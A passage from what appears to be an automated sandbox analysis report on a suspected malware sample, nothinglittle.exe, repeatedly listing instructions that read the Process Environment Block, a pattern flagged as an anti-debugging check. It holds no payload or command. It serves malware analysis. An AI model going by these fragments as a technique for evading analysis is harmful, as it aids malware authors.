Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_013431DC mov eax, dword ptr fs:[00000030h]	28_2_013431DC
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_013431DC mov eax, dword ptr fs:[00000030h]	28_2_013431DC
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_013431DC mov ecx, dword ptr fs:[00000030h]	28_2_013431DC
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_013431DC mov ecx, dword ptr fs:[00000030h]	28_2_013431DC
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_013431DC mov eax, dword ptr fs:[00000030h]	28_2_013431DC
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_013431DC mov eax, dword ptr fs:[00000030h]	28_2_013431DC
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_013431DC mov eax, dword ptr fs:[00000030h]	28_2_013431DC
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_013431DC mov eax, dword ptr fs:[00000030h]	28_2_013431DC
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0129C1C0 mov eax, dword ptr fs:[00000030h]	28_2_0129C1C0
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0129B02A mov eax, dword ptr fs:[00000030h]	28_2_0129B02A
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0129B02A mov eax, dword ptr fs:[00000030h]	28_2_0129B02A
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0129B02A mov eax, dword ptr fs:[00000030h]	28_2_0129B02A
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0129B02A mov eax, dword ptr fs:[00000030h]	28_2_0129B02A
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012B002D mov eax, dword ptr fs:[00000030h]	28_2_012B002D
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012B002D mov eax, dword ptr fs:[00000030h]	28_2_012B002D
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012B002D mov eax, dword ptr fs:[00000030h]	28_2_012B002D
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012B002D mov eax, dword ptr fs:[00000030h]	28_2_012B002D
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012B002D mov eax, dword ptr fs:[00000030h]	28_2_012B002D
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012B4020 mov edi, dword ptr fs:[00000030h]	28_2_012B4020
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01354015 mov eax, dword ptr fs:[00000030h]	28_2_01354015
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01354015 mov eax, dword ptr fs:[00000030h]	28_2_01354015
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01307016 mov eax, dword ptr fs:[00000030h]	28_2_01307016
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01307016 mov eax, dword ptr fs:[00000030h]	28_2_01307016
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01307016 mov eax, dword ptr fs:[00000030h]	28_2_01307016
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01313019 mov eax, dword ptr fs:[00000030h]	28_2_01313019
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012B701D mov eax, dword ptr fs:[00000030h]	28_2_012B701D
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012B701D mov eax, dword ptr fs:[00000030h]	28_2_012B701D
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012B701D mov eax, dword ptr fs:[00000030h]	28_2_012B701D
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012B701D mov eax, dword ptr fs:[00000030h]	28_2_012B701D
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012B701D mov eax, dword ptr fs:[00000030h]	28_2_012B701D
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012B701D mov eax, dword ptr fs:[00000030h]	28_2_012B701D
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01351074 mov eax, dword ptr fs:[00000030h]	28_2_01351074
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01342073 mov eax, dword ptr fs:[00000030h]	28_2_01342073
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01285050 mov eax, dword ptr fs:[00000030h]	28_2_01285050
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01285050 mov eax, dword ptr fs:[00000030h]	28_2_01285050
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01285050 mov eax, dword ptr fs:[00000030h]	28_2_01285050
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012A0050 mov eax, dword ptr fs:[00000030h]	28_2_012A0050
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012A0050 mov eax, dword ptr fs:[00000030h]	28_2_012A0050
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01287057 mov eax, dword ptr fs:[00000030h]	28_2_01287057
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012C90AF mov eax, dword ptr fs:[00000030h]	28_2_012C90AF
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012B20A0 mov eax, dword ptr fs:[00000030h]	28_2_012B20A0
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012B20A0 mov eax, dword ptr fs:[00000030h]	28_2_012B20A0
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012B20A0 mov eax, dword ptr fs:[00000030h]	28_2_012B20A0
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012B20A0 mov eax, dword ptr fs:[00000030h]	28_2_012B20A0
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012B20A0 mov eax, dword ptr fs:[00000030h]	28_2_012B20A0
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012B20A0 mov eax, dword ptr fs:[00000030h]	28_2_012B20A0
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012BF0BF mov ecx, dword ptr fs:[00000030h]	28_2_012BF0BF
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012BF0BF mov eax, dword ptr fs:[00000030h]	28_2_012BF0BF
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012BF0BF mov eax, dword ptr fs:[00000030h]	28_2_012BF0BF
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01289080 mov eax, dword ptr fs:[00000030h]	28_2_01289080
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_013460F5 mov eax, dword ptr fs:[00000030h]	28_2_013460F5
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_013460F5 mov eax, dword ptr fs:[00000030h]	28_2_013460F5
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_013460F5 mov eax, dword ptr fs:[00000030h]	28_2_013460F5
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_013460F5 mov eax, dword ptr fs:[00000030h]	28_2_013460F5
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012840E1 mov eax, dword ptr fs:[00000030h]	28_2_012840E1
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012840E1 mov eax, dword ptr fs:[00000030h]	28_2_012840E1
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012840E1 mov eax, dword ptr fs:[00000030h]	28_2_012840E1
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012870C0 mov eax, dword ptr fs:[00000030h]	28_2_012870C0
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012870C0 mov eax, dword ptr fs:[00000030h]	28_2_012870C0
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0134B0C7 mov eax, dword ptr fs:[00000030h]	28_2_0134B0C7
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0134B0C7 mov eax, dword ptr fs:[00000030h]	28_2_0134B0C7
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012AA309 mov eax, dword ptr fs:[00000030h]	28_2_012AA309
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012AA309 mov eax, dword ptr fs:[00000030h]	28_2_012AA309
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012AA309 mov eax, dword ptr fs:[00000030h]	28_2_012AA309
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012AA309 mov eax, dword ptr fs:[00000030h]	28_2_012AA309
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012AA309 mov eax, dword ptr fs:[00000030h]	28_2_012AA309
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012AA309 mov eax, dword ptr fs:[00000030h]	28_2_012AA309
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012AA309 mov eax, dword ptr fs:[00000030h]	28_2_012AA309
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012AA309 mov eax, dword ptr fs:[00000030h]	28_2_012AA309
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012AA309 mov eax, dword ptr fs:[00000030h]	28_2_012AA309
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012AA309 mov eax, dword ptr fs:[00000030h]	28_2_012AA309
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012AA309 mov eax, dword ptr fs:[00000030h]	28_2_012AA309
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012AA309 mov eax, dword ptr fs:[00000030h]	28_2_012AA309
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012AA309 mov eax, dword ptr fs:[00000030h]	28_2_012AA309
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012AA309 mov eax, dword ptr fs:[00000030h]	28_2_012AA309
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012AA309 mov eax, dword ptr fs:[00000030h]	28_2_012AA309
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012AA309 mov eax, dword ptr fs:[00000030h]	28_2_012AA309
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012AA309 mov eax, dword ptr fs:[00000030h]	28_2_012AA309
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012AA309 mov eax, dword ptr fs:[00000030h]	28_2_012AA309
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012AA309 mov eax, dword ptr fs:[00000030h]	28_2_012AA309
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012AA309 mov eax, dword ptr fs:[00000030h]	28_2_012AA309
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012AA309 mov eax, dword ptr fs:[00000030h]	28_2_012AA309
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0134131B mov eax, dword ptr fs:[00000030h]	28_2_0134131B
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01316365 mov eax, dword ptr fs:[00000030h]	28_2_01316365
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01316365 mov eax, dword ptr fs:[00000030h]	28_2_01316365
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01316365 mov eax, dword ptr fs:[00000030h]	28_2_01316365
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0129F370 mov eax, dword ptr fs:[00000030h]	28_2_0129F370
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0129F370 mov eax, dword ptr fs:[00000030h]	28_2_0129F370
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0129F370 mov eax, dword ptr fs:[00000030h]	28_2_0129F370
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0128F358 mov eax, dword ptr fs:[00000030h]	28_2_0128F358
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012B138B mov eax, dword ptr fs:[00000030h]	28_2_012B138B
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012B138B mov eax, dword ptr fs:[00000030h]	28_2_012B138B
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012B138B mov eax, dword ptr fs:[00000030h]	28_2_012B138B
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0133D380 mov ecx, dword ptr fs:[00000030h]	28_2_0133D380
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012BB390 mov eax, dword ptr fs:[00000030h]	28_2_012BB390
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012B2397 mov eax, dword ptr fs:[00000030h]	28_2_012B2397
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0134138A mov eax, dword ptr fs:[00000030h]	28_2_0134138A
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012B03E2 mov eax, dword ptr fs:[00000030h]	28_2_012B03E2
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012B03E2 mov eax, dword ptr fs:[00000030h]	28_2_012B03E2
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012B03E2 mov eax, dword ptr fs:[00000030h]	28_2_012B03E2
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012B03E2 mov eax, dword ptr fs:[00000030h]	28_2_012B03E2
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012B03E2 mov eax, dword ptr fs:[00000030h]	28_2_012B03E2
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012B03E2 mov eax, dword ptr fs:[00000030h]	28_2_012B03E2
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_013323E3 mov ecx, dword ptr fs:[00000030h]	28_2_013323E3
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_013323E3 mov ecx, dword ptr fs:[00000030h]	28_2_013323E3
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_013323E3 mov eax, dword ptr fs:[00000030h]	28_2_013323E3
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012B53C5 mov eax, dword ptr fs:[00000030h]	28_2_012B53C5
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_013053CA mov eax, dword ptr fs:[00000030h]	28_2_013053CA
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_013053CA mov eax, dword ptr fs:[00000030h]	28_2_013053CA
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012AA229 mov eax, dword ptr fs:[00000030h]	28_2_012AA229
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012AA229 mov eax, dword ptr fs:[00000030h]	28_2_012AA229
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012AA229 mov eax, dword ptr fs:[00000030h]	28_2_012AA229
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012AA229 mov eax, dword ptr fs:[00000030h]	28_2_012AA229
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012AA229 mov eax, dword ptr fs:[00000030h]	28_2_012AA229
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012AA229 mov eax, dword ptr fs:[00000030h]	28_2_012AA229
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012AA229 mov eax, dword ptr fs:[00000030h]	28_2_012AA229
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012AA229 mov eax, dword ptr fs:[00000030h]	28_2_012AA229
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012AA229 mov eax, dword ptr fs:[00000030h]	28_2_012AA229
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01288239 mov eax, dword ptr fs:[00000030h]	28_2_01288239
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01288239 mov eax, dword ptr fs:[00000030h]	28_2_01288239
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01288239 mov eax, dword ptr fs:[00000030h]	28_2_01288239
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012AB236 mov eax, dword ptr fs:[00000030h]	28_2_012AB236
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012AB236 mov eax, dword ptr fs:[00000030h]	28_2_012AB236
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012AB236 mov eax, dword ptr fs:[00000030h]	28_2_012AB236
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012AB236 mov eax, dword ptr fs:[00000030h]	28_2_012AB236
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012AB236 mov eax, dword ptr fs:[00000030h]	28_2_012AB236
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012AB236 mov eax, dword ptr fs:[00000030h]	28_2_012AB236
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01341229 mov eax, dword ptr fs:[00000030h]	28_2_01341229
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01285210 mov eax, dword ptr fs:[00000030h]	28_2_01285210
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01285210 mov ecx, dword ptr fs:[00000030h]	28_2_01285210
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01285210 mov eax, dword ptr fs:[00000030h]	28_2_01285210
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01285210 mov eax, dword ptr fs:[00000030h]	28_2_01285210
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0133B260 mov eax, dword ptr fs:[00000030h]	28_2_0133B260
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0133B260 mov eax, dword ptr fs:[00000030h]	28_2_0133B260
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012C927A mov eax, dword ptr fs:[00000030h]	28_2_012C927A
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01314257 mov eax, dword ptr fs:[00000030h]	28_2_01314257
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01289240 mov eax, dword ptr fs:[00000030h]	28_2_01289240
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01289240 mov eax, dword ptr fs:[00000030h]	28_2_01289240
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01289240 mov eax, dword ptr fs:[00000030h]	28_2_01289240
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01289240 mov eax, dword ptr fs:[00000030h]	28_2_01289240
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012962A0 mov eax, dword ptr fs:[00000030h]	28_2_012962A0
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012962A0 mov eax, dword ptr fs:[00000030h]	28_2_012962A0
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012962A0 mov eax, dword ptr fs:[00000030h]	28_2_012962A0
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012962A0 mov eax, dword ptr fs:[00000030h]	28_2_012962A0
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012852A5 mov eax, dword ptr fs:[00000030h]	28_2_012852A5
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012852A5 mov eax, dword ptr fs:[00000030h]	28_2_012852A5
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012852A5 mov eax, dword ptr fs:[00000030h]	28_2_012852A5
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012852A5 mov eax, dword ptr fs:[00000030h]	28_2_012852A5
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012852A5 mov eax, dword ptr fs:[00000030h]	28_2_012852A5
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012B12BD mov esi, dword ptr fs:[00000030h]	28_2_012B12BD
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012B12BD mov eax, dword ptr fs:[00000030h]	28_2_012B12BD
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012B12BD mov eax, dword ptr fs:[00000030h]	28_2_012B12BD
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0134129A mov eax, dword ptr fs:[00000030h]	28_2_0134129A
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012BD294 mov eax, dword ptr fs:[00000030h]	28_2_012BD294
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012BD294 mov eax, dword ptr fs:[00000030h]	28_2_012BD294
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0134B2E8 mov eax, dword ptr fs:[00000030h]	28_2_0134B2E8
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0134B2E8 mov eax, dword ptr fs:[00000030h]	28_2_0134B2E8
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0134B2E8 mov eax, dword ptr fs:[00000030h]	28_2_0134B2E8
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0134B2E8 mov eax, dword ptr fs:[00000030h]	28_2_0134B2E8
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012812D4 mov eax, dword ptr fs:[00000030h]	28_2_012812D4
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0130A537 mov eax, dword ptr fs:[00000030h]	28_2_0130A537
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012BF527 mov eax, dword ptr fs:[00000030h]	28_2_012BF527
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012BF527 mov eax, dword ptr fs:[00000030h]	28_2_012BF527
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012BF527 mov eax, dword ptr fs:[00000030h]	28_2_012BF527
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0134E539 mov eax, dword ptr fs:[00000030h]	28_2_0134E539
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01343518 mov eax, dword ptr fs:[00000030h]	28_2_01343518
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01343518 mov eax, dword ptr fs:[00000030h]	28_2_01343518
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01343518 mov eax, dword ptr fs:[00000030h]	28_2_01343518
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0128751A mov eax, dword ptr fs:[00000030h]	28_2_0128751A
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0128751A mov eax, dword ptr fs:[00000030h]	28_2_0128751A
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0128751A mov eax, dword ptr fs:[00000030h]	28_2_0128751A
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0128751A mov eax, dword ptr fs:[00000030h]	28_2_0128751A
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01289515 mov ecx, dword ptr fs:[00000030h]	28_2_01289515
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012AC577 mov eax, dword ptr fs:[00000030h]	28_2_012AC577
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012AC577 mov eax, dword ptr fs:[00000030h]	28_2_012AC577
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0128354C mov eax, dword ptr fs:[00000030h]	28_2_0128354C
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0128354C mov eax, dword ptr fs:[00000030h]	28_2_0128354C
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01303540 mov eax, dword ptr fs:[00000030h]	28_2_01303540
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012B35A1 mov eax, dword ptr fs:[00000030h]	28_2_012B35A1
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012B65A0 mov eax, dword ptr fs:[00000030h]	28_2_012B65A0
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012B65A0 mov eax, dword ptr fs:[00000030h]	28_2_012B65A0
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012B65A0 mov eax, dword ptr fs:[00000030h]	28_2_012B65A0
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_013505AC mov eax, dword ptr fs:[00000030h]	28_2_013505AC
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_013505AC mov eax, dword ptr fs:[00000030h]	28_2_013505AC
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012B2581 mov eax, dword ptr fs:[00000030h]	28_2_012B2581
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012B2581 mov eax, dword ptr fs:[00000030h]	28_2_012B2581
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012B2581 mov eax, dword ptr fs:[00000030h]	28_2_012B2581
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012B2581 mov eax, dword ptr fs:[00000030h]	28_2_012B2581
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0134B581 mov eax, dword ptr fs:[00000030h]	28_2_0134B581
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0134B581 mov eax, dword ptr fs:[00000030h]	28_2_0134B581
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0134B581 mov eax, dword ptr fs:[00000030h]	28_2_0134B581
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0134B581 mov eax, dword ptr fs:[00000030h]	28_2_0134B581
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01283591 mov eax, dword ptr fs:[00000030h]	28_2_01283591
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012B95EC mov eax, dword ptr fs:[00000030h]	28_2_012B95EC
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0129D5E0 mov eax, dword ptr fs:[00000030h]	28_2_0129D5E0
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0129D5E0 mov eax, dword ptr fs:[00000030h]	28_2_0129D5E0
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012895F0 mov eax, dword ptr fs:[00000030h]	28_2_012895F0
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012895F0 mov ecx, dword ptr fs:[00000030h]	28_2_012895F0
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012815C1 mov eax, dword ptr fs:[00000030h]	28_2_012815C1
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01284439 mov eax, dword ptr fs:[00000030h]	28_2_01284439
